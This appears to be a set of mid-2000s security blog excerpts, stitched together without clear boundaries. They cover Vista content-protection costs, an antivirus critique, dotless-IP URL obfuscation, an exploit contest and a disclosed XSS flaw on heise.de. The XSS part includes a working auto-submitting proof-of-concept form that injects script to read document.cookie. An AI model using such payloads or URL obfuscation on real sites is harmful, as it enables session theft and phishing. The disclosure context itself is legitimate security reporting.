morph3us.org

Read this article and you know it. (o:

Peter Gutmann wrote a nice paper called "A Cost Analysis of Windows Vista Content Protection" in which he describes the Windows Vista's built-in content protection mechanisms and the considerable costs which are caused by these protections.

I'm going to quote several interesting sentences of his paper:

Providing this protection incurs considerable costs in terms of system performance, system stability, technical support overhead, and hardware and software cost. These issues affect not only users of Vista but the entire PC industry, since the effects of the protection measures extend to cover all hardware and software that will ever come into contact with Vista, even if it's not used directly with Vista (for example hardware in a Macintosh computer or on a Linux server)

I reported almost all of these DoS vulnerabilities more than a year ago to Microsoft but they are still not fixed..

Note that the offsets where the browser crashes has changed because of the installed security updates.

As I already mentioned in a previous blog posting titled XSS on heise.de there was a XSS vulnerability on heise.de. I informed heise's webmaster about this bug on December 23, 2005 and received the answer mail which stated that this issue was addressed on January 06, 2006. It's almost unbelievable that this bug is still present to this day.

 1. Definition file
 1.1. "Encrypted" with xor \
 1.2. Packed with ZIP with simple password - trivial to intercept def updates
      and change the defs to make the malware invisible
 1.3. No checksum in the def file /
 1.4. Big redundancy in the def file
 1.5. Multiplying the number of entries in the def file with constant 1.46 
      to make it look it has more definitions 

2. Program
 2.1. Poorly written checksum algo
 2.2. Poorly written scanning algo (slow as hell)
 2.3. CSI works only for in-memory images and is useless

You want the proofs? Read the following text ...

https://rootkit.com/newsread.php?newsid=471

First of all, I should explain what "dotless ip addresses" are because I think this term is not very common. Simply spoken this is an address which does not consist of octets seperated by points. You may ask the question how to convert an ip adress into a dotless one..

In fact there are several different methods to convert an ip address into a dotless one and there are much more possibilities to obfuscate an URL but not all of them work in every browser.

Here are some examples, in which I'll use the domain 'buha.info' for demonstration purposes:

The BuHa ExploitMe Contest is organized in multiple levels with increasing difficulty. In each of this levels you'll find a exploitable ANSI C program and a small advice about the kind of shellcode which should be used. The first and the second level do not require the usage of any shellcode because people which are not familar with security related bugs in C programs should be able to complete them too.

The contest started almost a week ago and until now there are 19 different participants. I was surprised about three brazilian guys which also take part in the contest and found the contest site with Google.

Check it out: https://www.buha.info/projects/exploitme-contest/

heise.de - a German news site for, amongst others, security related topics - is vulnerable for XSS (Cross Site Scripting). I contacted the webmaster of heise.de about this on December 23 but I did not receive an answer and the XSS vulnerability is still not addressed.

PoC:

<form method="post" action="http://www.heise.de/registration/"
  name="heise">
  <input type="text" name="uid" size="20" value=''>
  <input type="text" name="vorname" size="20"
 value='"><script>alert(document.cookie)</script>'>
  <input type="text" name="name" size="20"
 value='"><script>alert(document.cookie)</script>'>
</form>
<body onload="heise.submit();">

heise-xss-poc.txt

UPDATE: 2006-01-09: 20:26

Hallo Herr Waldegger,

vielen Dank für Ihren Hinweis. Aufgrund der Feiertage hat die Behebung leider etwas länger gedauert.

Mit freundlichen Grüßen
heise online
Webmaster

There was a vulnerability in Google's Gmail service which allowed it to take control over an arbitrary mail account without requiring any cookie thefts. According to the bug spotter the vulnerability was fixed by Google on October 18.

http://www.elhacker.net/gmailbug/english_version.htm

M$ released the Bulletin MS05-053 to resolve some latley discovered vulnerabilities in the rendering of Windows Metafile (WMF) and Windows Metafile (WMF) image format. See CAN-2005-2123, CAN-2005-2124 and EMF file DOS vulnerability for details.

Therefore I updated the update pack for Windoze XP SP2..